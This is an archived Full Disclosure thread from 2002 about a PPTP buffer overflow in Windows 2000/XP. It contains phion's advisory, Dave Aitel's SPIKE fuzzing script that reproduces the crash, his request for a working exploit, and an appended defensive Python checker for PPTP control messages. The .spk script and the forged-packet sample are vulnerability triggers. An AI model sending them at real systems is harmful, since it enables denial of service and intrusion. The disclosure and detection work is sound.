Full Disclosure mailing list archives
Re: Microsoft PPTP Server and Client remote vulnerability
From: dave () immunitysec com (Dave Aitel)
Date: 26 Sep 2002 16:13:21 -0400
SPIKE 2.6.2 or above should be able to handle this .spk file which will
replicate the vulnerability. Someone send me a working sploit in
exchange, please. I'm too lazy to muck with it. (Or I have other exploits
to muck with, one or the other :>)

-dave

P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy) at
http://www.immunitysec.com/spike.html, if you haven't already.

P.P.S. This script is released under the terms of the GNU GPL v 2.0.

On Thu, 2002-09-26 at 05:43, sh () phion com wrote:
phion Security Advisory 26/09/2002

Microsoft PPTP Server and Client remote vulnerability


Summary
-----------------------------

The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
remotely exploitable pre-authentication buffer overflow.


Affected Systems
-----------------------------

Microsoft Windows 2000 and XP running either a PPTP Server or Client.


Impact
-----------------------------

With a specially crafted PPTP packet it is possible to overwrite kernel
memory.

A DoS resulting in a lockup of the machine has been verified on Windows
2000 SP3 and Windows XP.

A remote compromise should be possible deploying proper shellcode, as we
were able to fill EDI and EDX with our data.

Clients are vulnerable too, because the Service always listens on port
1723 on any interface of the machine; this might be of special concern to
DSL users which use PPTP to connect to their modem.


Solution
-----------------------------

As a temporary solution for the Client issue, one might firewall the PPTP
port in the Internet Connection Firewall for Windows XP.

We don't know of any solution for Windows 2000 and Windows XP PPTP servers.

The vendor has been informed.


Acknowledgements
-----------------------------

The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner
on behalf of phion Information Technologies.


Contact Information
-----------------------------

phion Information Technologies can be reached via:
office () phion com / http://www.phion.com

Stephan Hoffmann can be reached via: sh () phion com

Thomas Unterleitner can be reached via: t.unterleitner () phion com


References
-----------------------------

[1] phion Information Technologies http://www.phion.com/


Exploit
-----------------------------

phion Information Technologies will not provide an exploit for this issue.


Disclaimer
-----------------------------

This advisory does not claim to be complete or to be usable for any
purpose.

This advisory is free for open distribution in unmodified form.

Articles or Publications that are based on information from this advisory
have to include link [1].
Attachment: pptp.spk

//start control request
s_block_start("PPTP");
//length of the whole message, filled in from the PPTP block
s_binary_block_size_halfword_bigendian("PPTP");
//message type 1 - control message
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 1 - start control request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//Framing: Ethernet
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);
//hostname (64-byte field, NUL padded)
s_string_variable("A");
s_binary_repeat("00",63);
//vendor (64-byte field, NUL padded)
s_string_variable("A");
s_binary_repeat("00",63);
s_block_end("PPTP");

///
/// NEXT PACKET
///
///

//start outgoing call request
s_block_start("PPTP2");
s_binary_block_size_halfword_bigendian("PPTP2");
//message type 1 - control message
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 7 - outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");
//call id
s_binary("0000");
//serial number
s_binary("0000");
//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//receive window size
s_binary("0003");
//processing delay
s_binary("0000");
//phone number length, filled in from the PHONENUMBER block below
s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress
s_string_variable("");
s_block_end("PPTP2");
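The .spk script above builds two PPTP control messages, a Start-Control-Connection-Request and an Outgoing-Call-Request, and lets SPIKE vary their length, integer and string fields. For the defender's side of the same material, here is an added example (not part of Dave's post, not SPIKE code, and not from the phion advisory) that builds the two well-formed messages with the RFC 2637 field layout the script follows and then sanity-checks any received control message: header length versus actual size, magic cookie, the fixed 156/168-byte sizes of these two message types, NUL-termination of the 64-byte host name and vendor fields, and the phone-number length. The function names, the constructed sample packets and the use of only the two message types from the script are my own choices; a server-side filter or an IDS signature for port 1723 would apply the same checks.

```python
"""Builder and sanity checker for PPTP (RFC 2637) control messages."""
import struct

MAGIC_COOKIE = 0x1A2B3C4D
MSG_TYPE_CONTROL = 1      # PPTP Message Type 1 = control message
CTRL_SCCRQ = 1            # Start-Control-Connection-Request
CTRL_OCRQ = 7             # Outgoing-Call-Request
KNOWN_CTRL_TYPES = set(range(1, 16))          # RFC 2637 defines types 1..15
FIXED_SIZES = {CTRL_SCCRQ: 156, CTRL_OCRQ: 168}  # only the two types used here
HEADER_LEN = 12           # length, msg type, cookie, ctrl type, reserved0


def _fixed_str(s, size=64):
    """Encode a string into a fixed-size, NUL-padded and NUL-terminated field."""
    b = s.encode("ascii")
    if len(b) >= size:
        raise ValueError("string does not fit in a %d-byte field" % size)
    return b + b"\x00" * (size - len(b))


def _wrap(body):
    """Prepend the common header: total length, PPTP message type, magic cookie."""
    return struct.pack("!HHI", 8 + len(body), MSG_TYPE_CONTROL, MAGIC_COOKIE) + body


def build_sccrq(hostname="A", vendor="A"):
    """Well-formed SCCRQ with the same values as the .spk script (156 bytes)."""
    body = struct.pack(
        "!HHHHIIHH",
        CTRL_SCCRQ, 0,      # control message type, reserved0
        0x0100, 0,          # protocol version 1.0, reserved1
        3, 2,               # framing (async+sync), bearer (digital)
        0xFFFF, 1,          # maximum channels, firmware revision
    )
    return _wrap(body + _fixed_str(hostname) + _fixed_str(vendor))


def build_ocrq(phone="", subaddress=""):
    """Well-formed OCRQ (168 bytes); the script leaves phone/subaddress empty."""
    body = struct.pack(
        "!HHHHIIIIHHHH",
        CTRL_OCRQ, 0,       # control message type, reserved0
        0, 0,               # call id, call serial number
        2400, 10000000,     # minimum / maximum bps (0x960 / 0x989680)
        2, 3,               # bearer type, framing type
        3, 0,               # packet receive window, processing delay
        len(phone), 0,      # phone number length, reserved1
    )
    return _wrap(body + _fixed_str(phone) + _fixed_str(subaddress))


def check_control_message(pkt):
    """Return a list of anomaly descriptions for one control message ([] = sane)."""
    problems = []
    if len(pkt) < HEADER_LEN:
        return ["truncated: %d bytes, need %d for the header" % (len(pkt), HEADER_LEN)]
    length, msg_type, cookie, ctrl_type, _res0 = struct.unpack("!HHIHH", pkt[:HEADER_LEN])
    if cookie != MAGIC_COOKIE:
        problems.append("bad magic cookie 0x%08x" % cookie)
    if msg_type != MSG_TYPE_CONTROL:
        problems.append("unexpected PPTP message type %d" % msg_type)
    if length != len(pkt):
        problems.append("length field %d disagrees with actual size %d" % (length, len(pkt)))
    if ctrl_type not in KNOWN_CTRL_TYPES:
        problems.append("unknown control message type %d" % ctrl_type)
    expected = FIXED_SIZES.get(ctrl_type)
    if expected is not None and len(pkt) != expected:
        problems.append("type %d must be %d bytes, got %d" % (ctrl_type, expected, len(pkt)))
    if ctrl_type == CTRL_SCCRQ and len(pkt) >= 156:
        # host name at offset 28, vendor at 92; each must hold a NUL within 64 bytes
        for name, off in (("host name", 28), ("vendor", 92)):
            if b"\x00" not in pkt[off:off + 64]:
                problems.append("%s field is not NUL-terminated within 64 bytes" % name)
    if ctrl_type == CTRL_OCRQ and len(pkt) >= 40:
        phone_len = struct.unpack("!H", pkt[36:38])[0]   # phone number length field
        if phone_len > 64:
            problems.append("phone number length %d exceeds the 64-byte field" % phone_len)
    return problems


def forged_sccrq():
    """Constructed sample: SCCRQ with a lying length field and an unterminated host name."""
    bad = bytearray(build_sccrq())
    bad[0:2] = b"\xff\xff"          # header claims 65535 bytes
    bad[28:92] = b"A" * 64          # host name field without a NUL terminator
    return bytes(bad)


if __name__ == "__main__":
    for label, pkt in (("sccrq", build_sccrq()), ("ocrq", build_ocrq()),
                       ("forged", forged_sccrq()), ("short", b"\x00" * 5)):
        print(label, len(pkt), check_control_message(pkt) or "ok")
```

Run stand-alone, the script reports the two well-formed messages as "ok", two findings for the forged SCCRQ (length mismatch and unterminated host name) and one for the truncated packet. The checks are deliberately conservative: a message that fails any of them is malformed under RFC 2637 regardless of which implementation receives it, so they can be applied in front of a PPTP service without knowing the details of the flaw.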